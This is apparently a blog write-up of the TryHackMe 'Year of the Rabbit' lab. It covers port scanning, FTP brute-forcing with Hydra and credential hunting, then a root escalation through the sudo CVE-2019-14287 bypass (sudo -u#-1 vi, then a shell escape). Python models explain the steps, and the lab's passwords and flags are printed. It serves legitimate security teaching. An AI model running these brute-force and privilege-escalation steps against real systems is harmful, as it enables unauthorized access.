Year of the Rabbit - TryHackMe

Year of the Rabbit

Fun Box.

Nmap

A full TCP port scan (all 65535 ports are accounted for) finds three open services:
Nmap scan report for 10.10.117.67
Host is up (0.15s latency).
Not shown: 65170 closed ports, 362 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Recon

Port 21

Anonymous login is disabled.

Port 22

We have no credentials yet, so SSH is parked until we find some. On to port 80.

Port 80

[Pasted image 20211005160417.png]

The web root serves the default Apache page, so we fuzz for directories and files with ffuf:

┌──(kali@kali)-[~/ctf/tryhackme/Year_of_the_Rabbit]
└─$ ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://10.10.117.67/FUZZ -e .php,.html,.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.117.67/FUZZ
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
 :: Extensions       : .php .html .txt 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

index.html              [Status: 200, Size: 7853, Words: 2862, Lines: 190, Duration: 144ms]
assets                  [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 145ms]

Apart from /assets, the wordlist turns up nothing of interest.

[Pasted image 20211005161057.png]

Foothold

[Pasted image 20211005170017.png]

[Pasted image 20211005170334.png]

[Pasted image 20211005170406.png]

strings Hot_Babe.png

[Pasted image 20211005172748.png]

The strings output ends with a block of candidate passwords and states that one of them is the password for ftpuser, so save that list to a file (password.txt) to use as a wordlist.
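To see why text appended to an image survives in `strings` output, and how to turn it into a Hydra wordlist, here is an added Python example (not from the original post). The PNG bytes and the candidate passwords are constructed stand-ins for Hot_Babe.png, not the real ones; `extract_strings` mirrors the default behaviour of GNU `strings` (runs of at least four printable ASCII bytes), and `password_candidates` is a filter of my own choosing.

```python
"""Pull appended text out of an image the way `strings` does, then turn it
into a Hydra wordlist. Added example; the image and the candidates are
constructed, not the real Hot_Babe.png."""
from __future__ import annotations

import re
from pathlib import Path

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype: bytes, body: bytes) -> bytes:
    """length + type + data + dummy CRC (this is a constructed file; nothing validates the CRC)."""
    return len(body).to_bytes(4, "big") + ctype + body + b"\x00\x00\x00\x00"


# Constructed stand-in for Hot_Babe.png: a plausible header, opaque pixel data
# with no printable bytes, then plain text appended after IEND. Image viewers
# stop at IEND, so the picture still renders, but `strings` walks the whole
# file and prints the trailer.
NOISE = bytes(range(0x80, 0x100)) * 8
TRAILER = b"""
Note to self: the ftpuser password is one of these (constructed list)
c0nstruct3dPa55
n0tTheRe4lOne!
Sup3rS3cretZ9
"""
HOT_BABE_PNG = (
    PNG_SIGNATURE
    + png_chunk(b"IHDR", b"\x00\x00\x00\x01\x00\x00\x00\x01\x08\x02\x00\x00\x00")
    + png_chunk(b"IDAT", NOISE)
    + png_chunk(b"IEND", b"")
    + TRAILER
)


def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Equivalent of `strings -n <min_len>`: runs of printable ASCII (0x20-0x7e plus tab)."""
    pattern = rb"[\x20-\x7e\t]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def password_candidates(found: list[str], min_len: int = 8) -> list[str]:
    """Keep single-token lines long enough to be a password; this drops the
    four-letter PNG chunk names (IHDR, IDAT, IEND) and the prose note."""
    return [s.strip() for s in found if len(s.strip()) >= min_len and " " not in s.strip()]


def write_wordlist(path: str, words: list[str]) -> int:
    """One candidate per line, the format `hydra -P` expects; returns the count."""
    Path(path).write_text("\n".join(words) + "\n")
    return len(words)


if __name__ == "__main__":
    found = extract_strings(HOT_BABE_PNG)
    print("\n".join(found))  # IHDR, IDAT, IEND, then the appended lines
    n = write_wordlist("password.txt", password_candidates(found))
    print(f"{n} candidates written; next: hydra -l ftpuser -P password.txt <target> ftp")
```

On the real file, `strings -n 8 Hot_Babe.png` drops the chunk names and most binary noise before you filter anything by hand.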

[Pasted image 20211005173036.png]

Brute-force the FTP login for ftpuser against that list with Hydra:

┌──(kali@kali)-[~/ctf/tryhackme/Year_of_the_Rabbit]
└─$ hydra -l ftpuser -P password.txt 10.10.11.105 ftp
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-05 17:33:37
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 82 login tries (l:1/p:82), ~6 tries per task
[DATA] attacking ftp://10.10.11.105:21/
[21][ftp] host: 10.10.11.105   login: ftpuser   password: 5iez1wGXKfPKQ
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-05 17:34:02
User: ftpuser
Password: 5iez1wGXKfPKQ
Log in to FTP with the recovered password; the only file on offer is Eli's_Creds.txt:
┌──(kali@kali)-[~/ctf/tryhackme/Year_of_the_Rabbit]
└─$ ftp 10.10.11.105                                                                                                       
Connected to 10.10.11.105.
220 (vsFTPd 3.0.2)
Name (10.10.11.105:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             758 Jan 23  2020 Eli's_Creds.txt
226 Directory send OK.
ftp> get "Eli's_Creds.txt"
local: Eli's_Creds.txt remote: Eli's_Creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for Eli's_Creds.txt (758 bytes).
226 Transfer complete.
758 bytes received in 0.01 secs (59.9866 kB/s)
ftp> 
┌──(kali@kali)-[~/ctf/tryhackme/Year_of_the_Rabbit]
└─$ cat Eli\'s_Creds.txt                                
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
<]>+. <+++[ ->--- <]>-- ---.- ----. <

The file is a Brainfuck program. Decoding it yields eli's credentials:

[Pasted image 20211005173906.png]

User: eli
Password: DSpDiM1wAEwid

User

[Pasted image 20211005174011.png]

Log in as eli over SSH and search the filesystem for anything named s3cr3t:
eli@year-of-the-rabbit:~$ locate s3cr3t
/usr/games/s3cr3t
/usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
/var/www/html/sup3r_s3cr3t_fl4g.php
eli@year-of-the-rabbit:~$ 
The hidden file is a note from root to Gwendoline:
eli@year-of-the-rabbit:~$ cat /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly*
Your password is awful, Gwendoline. 
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!

Yours sincerely
   -Root
eli@year-of-the-rabbit:~$ 
The note leaks gwendoline's password (MniVCQVhQHUNI), so switch to that user and read the user flag:
eli@year-of-the-rabbit:~$ su - gwendoline
Password: 
gwendoline@year-of-the-rabbit:~$ id
uid=1001(gwendoline) gid=1001(gwendoline) groups=1001(gwendoline)
gwendoline@year-of-the-rabbit:~$ ls -rlta
total 24
-rw-r--r-- 1 gwendoline gwendoline  675 Jan 23  2020 .profile
-rw-r--r-- 1 gwendoline gwendoline 3515 Jan 23  2020 .bashrc
-rw-r--r-- 1 gwendoline gwendoline  220 Jan 23  2020 .bash_logout
lrwxrwxrwx 1 root       root          9 Jan 23  2020 .bash_history -> /dev/null
-r--r----- 1 gwendoline gwendoline   46 Jan 23  2020 user.txt
drwxr-xr-x 2 gwendoline gwendoline 4096 Jan 23  2020 .
drwxr-xr-x 4 root       root       4096 Jan 23  2020 ..
gwendoline@year-of-the-rabbit:~$ cat user.txt 
THM{1107174691af9ff3681d2b5bdb5740b1589bae53}

Root

Check what gwendoline is allowed to run with sudo:
gwendoline@year-of-the-rabbit:~$ sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
gwendoline@year-of-the-rabbit:~$ 

We cannot run vi as root directly: the Runas spec (ALL, !root) allows any target user except root. However, sudo versions before 1.8.28 (CVE-2019-14287) did not validate the numeric user id passed with -u#. An id of -1 is not 0, so it passes the !root check, but once cast to uid_t it is 4294967295, the value setresuid() treats as "leave this id unchanged". Sudo is already running as root at that point, so the command keeps uid 0.

In effect, -u#-1 (or -u#4294967295) runs the permitted command as root:

sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt

Inside vi, :! runs a shell command with vi's privileges, so we can read the root flag directly (or spawn an interactive root shell with :!/bin/sh):

:!cat /root/root.txt
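As an added illustration (not from the original post, and a simplified Python model rather than sudo's source), the following mirrors the three steps involved: resolving the -u argument, applying the (ALL, !root) Runas check, and the kernel's handling of uid -1 in setresuid(). The passwd entries are constructed; `fixed=True` models the 1.8.28 behaviour of rejecting -1 / 4294967295 as an invalid id.

```python
"""Why `sudo -u#-1` slips past a (ALL, !root) Runas spec on sudo < 1.8.28
(CVE-2019-14287). Added example: a Python model of the checks involved,
not sudo's code; the passwd table is constructed."""
from __future__ import annotations

import re

UID_MAX = 0xFFFFFFFF   # uid_t is an unsigned 32-bit integer, so -1 becomes this value
ROOT = 0
PASSWD = {"root": 0, "eli": 1000, "gwendoline": 1001}   # constructed entries


def parse_runas_user(arg: str) -> int:
    """Resolve the -u argument: '#N' is taken as a numeric id (truncated to
    uid_t as a C cast would); anything else is looked up by name."""
    if arg.startswith("#"):
        return int(arg[1:]) & UID_MAX
    if arg not in PASSWD:
        raise KeyError(f"unknown user {arg!r}")
    return PASSWD[arg]


def runas_permitted(uid: int, excluded: frozenset[int] = frozenset({ROOT})) -> bool:
    """The '(ALL, !root)' spec: every uid is allowed except the excluded ones.
    The check compares ids; it never asks what setresuid() will actually do."""
    return uid not in excluded


def setresuid_result(current_uid: int, requested_uid: int) -> int:
    """Kernel semantics of setresuid(): an id of -1 (UID_MAX once cast)
    means 'leave this id unchanged'."""
    return current_uid if requested_uid == UID_MAX else requested_uid


def sudo_run_as(user_arg: str, fixed: bool) -> int | None:
    """Return the uid the command ends up with, or None if sudo refuses.
    sudo is setuid-root, so it already holds uid 0 when it switches user.
    fixed=True models sudo 1.8.28, which rejects -1 / 4294967295 up front."""
    uid = parse_runas_user(user_arg)
    if fixed and uid == UID_MAX:
        return None
    if not runas_permitted(uid):
        return None
    return setresuid_result(ROOT, uid)


def runas_excludes_only_root(sudo_l_output: str) -> bool:
    """Triage helper: does a `sudo -l` line carry a '(ALL, !root)' Runas entry?
    On an unpatched sudo that entry is effectively '(ALL)'."""
    return re.search(r"\(\s*ALL\s*,\s*!root\s*\)", sudo_l_output) is not None


if __name__ == "__main__":
    for arg in ("root", "eli", "#-1", "#4294967295"):
        print(f"{arg:>12}: vulnerable -> {sudo_run_as(arg, fixed=False)}, "
              f"fixed -> {sudo_run_as(arg, fixed=True)}")
```

The mismatch is between two predicates: the policy asks "is the requested id root?" while the kernel asks "is the requested id the no-change sentinel?", and -1 answers no to the first and yes to the second. `sudo --version` on the target tells you immediately whether this applies.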

[Pasted image 20211005175941.png]

Root flag: THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161}

This post is licensed under CC BY 4.0 by the author.